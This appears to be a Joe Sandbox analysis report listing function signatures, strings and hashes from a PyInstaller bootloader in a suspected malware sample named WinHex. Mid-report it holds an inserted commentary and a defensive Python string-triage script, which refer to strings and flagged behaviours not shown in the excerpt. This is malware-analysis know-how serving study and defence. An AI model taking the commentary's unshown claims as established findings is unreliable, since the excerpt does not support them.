                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                        • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                        • API String ID: 2238633743-1453502826
                                                                                                                        • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                        • Instruction ID: 6ca9727bcd8b4c374480aab79135fbb050de408e9abe94f3ba1df01c614855bb
                                                                                                                        • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                        • Instruction Fuzzy Hash: 44E19C69A0DB0390EA59EF18B950174EBA6EF14FF1BD45135C80D062A8EF7EF5988370
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                        • String ID: P%
                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                        • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction ID: a1a463c519bf6108ca561f6adb72de4cd2895d7ea456adffcb9f70a6cd967f34
                                                                                                                        • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction Fuzzy Hash: 6351E626614BA186D638AF36E4181BAFBA1FB98B65F404121EBCF43684DF3DD045DB20
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD74D7
                                                                                                                        • FormatMessageW.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD7506
                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 00007FF7C5BD755C
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                        • API String ID: 2920928814-2573406579
                                                                                                                        • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                        • Instruction ID: fe4a355ca845783776d585603199dbfe419796f75d79c0f8ab9cd272e8eeb1f4
                                                                                                                        • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                        • Instruction Fuzzy Hash: D7218335A1CA4282E724AF14E8413A6EB61FF58BA4FC40135D54D82698EF3EF145C760
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                        • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction ID: b9f6ea7da8f048efc9a061a2ed25360ecab9b535426d5a4c0a98d7e36432f315
                                                                                                                        • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction Fuzzy Hash: 21128362E0C14BC6FB247F15E0547BAFAA1FB80B64FCC4135D699466C4DBBEE4818B60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                        • Opcode ID: efd0891be10330c6936a4a3122e0582a69530ac68ce8ac451bd8ca1e0e6f8c8c
                                                                                                                        • Instruction ID: 0fc36d539ef71d072d827687d0b983611437a1b4b42d92eb5ddf835e803534bd
                                                                                                                        • Opcode Fuzzy Hash: efd0891be10330c6936a4a3122e0582a69530ac68ce8ac451bd8ca1e0e6f8c8c
                                                                                                                        • Instruction Fuzzy Hash: 59415F61B09A4281EA24FF15E4406BAEBA0EF44FB4FC44432DE4D47B59EE7EE542C720
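Taken together, the string sets above (the "Failed to get address for Py_…" and "… Tcl_…/Tk_…" lists, the "PyInstaller: …" and "LOADER: Failed to load tcl/tk libraries" messages, and the "Failed to extract %s: …" archive errors) identify every one of these functions as stock PyInstaller bootloader code rather than anything written by the sample's author. The triage routine below is an added example, not code from the report, from PyInstaller or from the sample. SAMPLE_BLOB is constructed from strings shown in this section, NUL-separated as they would sit in a read-only data region; on a real case the input would be the dumped .rdata region or the file from disk. The version inference rests on two facts about CPython (Py_UTF8Mode was added in 3.7, PyUnicode_AsUTF8 in 3.3); the ten-symbol fallback threshold and the reading of bootloader-side Tcl/Tk loading as PyInstaller's splash-screen support are my own choices, not something the report states.

```python
"""String triage of a PyInstaller bootloader image.

Added example; not code from the report, from PyInstaller or from the sample.
The bootloader resolves every CPython export it needs with GetProcAddress and
carries one "Failed to get address for <name>" message per export, so the
message strings double as an import list for the embedded interpreter.
"""
import re

# Messages emitted only by the PyInstaller bootloader (copied from the report).
BOOTLOADER_MARKERS = (
    b"PyInstaller: FormatMessageW failed.",
    b"PyInstaller: pyi_win32_utils_to_utf8 failed.",
    b"LOADER: Failed to load tcl/tk libraries",
    b"Failed to extract %s: failed to open archive file!",
)
# One match per export the loader looks up in the Python DLL or in tcl/tk.
GETPROC_RE = re.compile(rb"Failed to get address for ((?:Py|Tcl|Tk)[A-Za-z0-9_]+)")
# Pre-PEP 587 interpreter configuration globals; PyConfig_* would mean the newer API.
LEGACY_CONFIG = {"Py_SetPath", "Py_SetPythonHome", "Py_SetProgramName",
                 "Py_NoSiteFlag", "Py_FrozenFlag", "Py_IgnoreEnvironmentFlag"}
MIN_SYMBOLS_FOR_VERDICT = 10  # arbitrary fallback when no marker string survives


def resolved_symbols(blob: bytes) -> dict:
    """Split the resolved exports into CPython and Tcl/Tk names."""
    names = sorted({m.group(1).decode() for m in GETPROC_RE.finditer(blob)})
    return {"python": [n for n in names if n.startswith("Py")],
            "tcltk": [n for n in names if n.startswith(("Tcl", "Tk"))]}


def min_cpython_version(python_syms) -> str:
    s = set(python_syms)
    if "Py_UTF8Mode" in s:          # added in CPython 3.7 (PEP 540)
        return "3.7+"
    if "PyUnicode_AsUTF8" in s:     # added in CPython 3.3
        return "3.3+"
    return "unknown" if s else "n/a"


def triage(blob: bytes) -> dict:
    markers = [m.decode() for m in BOOTLOADER_MARKERS if m in blob]
    syms = resolved_symbols(blob)
    py = set(syms["python"])
    if py & LEGACY_CONFIG:
        config_api = "legacy globals"
    elif any(n.startswith("PyConfig_") for n in py):
        config_api = "PyConfig"
    else:
        config_api = "unknown"
    return {
        "is_pyinstaller": bool(markers) or len(py) >= MIN_SYMBOLS_FOR_VERDICT,
        "markers": markers,
        "python_symbols": syms["python"],
        "tcltk_symbols": syms["tcltk"],
        "min_cpython": min_cpython_version(syms["python"]),
        "config_api": config_api,
        # Bootloader-side Tcl/Tk loading: PyInstaller's splash-screen path (my reading).
        "tcltk_loader": bool(syms["tcltk"]) or "LOADER: Failed to load tcl/tk libraries" in markers,
    }


# Constructed input built from strings listed in this report section.
SAMPLE_BLOB = b"\x00".join([
    b"Failed to get address for PyDict_GetItemString",
    b"Failed to get address for PyErr_Print",
    b"Failed to get address for PyEval_EvalCode",
    b"Failed to get address for PyImport_ExecCodeModule",
    b"Failed to get address for PyMarshal_ReadObjectFromString",
    b"Failed to get address for PyRun_SimpleStringFlags",
    b"Failed to get address for PyUnicode_AsUTF8",
    b"Failed to get address for Py_Initialize",
    b"Failed to get address for Py_SetPath",
    b"Failed to get address for Py_SetPythonHome",
    b"Failed to get address for Py_UTF8Mode",
    b"Failed to get address for Tcl_CreateInterp",
    b"Failed to get address for Tk_Init",
    b"LOADER: Failed to load tcl/tk libraries",
    b"PyInstaller: FormatMessageW failed.",
    b"Failed to extract %s: failed to open archive file!",
    b"unrelated data \x90\x90\xcc",   # noise that must not match
])

if __name__ == "__main__":
    for key, value in triage(SAMPLE_BLOB).items():
        print(f"{key:>16}: {value}")
```

The practical consequence for this sample: PyMarshal_ReadObjectFromString, PyImport_ExecCodeModule and PyEval_EvalCode are how the loader runs marshalled code objects pulled from its appended archive, so the behaviour the report flags (scheduled tasks, PowerShell, sandbox checks) lives in that archive, not in the functions whose fuzzy hashes are listed here. The next step is to extract the archive and decompile the marshalled bytecode rather than to keep disassembling the loader.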
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                        • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction ID: 772815f43b8c0e4ccacaf03b884f6aaba6ae7c725493e9303bc5331e6fabdf53
                                                                                                                        • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction Fuzzy Hash: 51E18272A08B418AEB20AF65D4413ADBFA0FB55FA8F900135EE8D47B59CF39E490C750
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7C5BEE152,?,?,000001F51FAB5AA8,00007FF7C5BEA223,?,?,?,00007FF7C5BEA11A,?,?,?,00007FF7C5BE5472), ref: 00007FF7C5BEDF34
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000,?,00007FF7C5BEE152,?,?,000001F51FAB5AA8,00007FF7C5BEA223,?,?,?,00007FF7C5BEA11A,?,?,?,00007FF7C5BE5472), ref: 00007FF7C5BEDF40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                        • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction ID: bb4caca448e70f6f84f032567f965fdf20afa7a70296d8f1595b4534dab20310
                                                                                                                        • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction Fuzzy Hash: 98411422B19A1285FE25EF169804575AB92BF54FB0FCD4239DD0D47788EEBEE405C360
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD769F
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD76EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 626452242-27947307
                                                                                                                        • Opcode ID: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                                                                                        • Instruction ID: 8cf394125dec4e40598ad1a164190ae0acf85ea505d5433b523910bf6242399a
                                                                                                                        • Opcode Fuzzy Hash: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                                                                                        • Instruction Fuzzy Hash: 50418536A0CB8282D660EF15F4402A9FBA5FB84FA0F984535DA8D47B99DF7DE051C710
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD7B81
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD7BF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 3723044601-27947307
                                                                                                                        • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction ID: 0d1de49d71f8312abd5e5508090ed9daf69bdab55d6f7fb899235178049c6c9c
                                                                                                                        • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction Fuzzy Hash: DB219C35A1CB8285EA10AF26E8401B9FB61EB94FA0F984235CA0D43799EF7EF5418310
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$p$p
                                                                                                                        • API String ID: 3215553584-1995029353
                                                                                                                        • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction ID: d55eae33ffba98e0fee3df56c2bc23f63a9fb507286cb4b1583fe8c0ea6392d0
                                                                                                                        • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction Fuzzy Hash: 96129365E0C94386FB24BF15D0542B9FAA1FB81F64FCC4136D689476C4DBBEE5888B20
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 626452242-876015163
                                                                                                                        • Opcode ID: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                                                                                        • Instruction ID: 6731b6c7fa2bc40efc690b105d238bc7e9297c103b5c6d6837a093fd47474ed5
                                                                                                                        • Opcode Fuzzy Hash: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                                                                                        • Instruction Fuzzy Hash: E541B672A0CB4282E610EF15A4412B9EBA5FB84FA0F944135DF4D47BA8DF3DE456C710
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCF6D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCF7B
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCFA5
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCFEB
                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCFF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
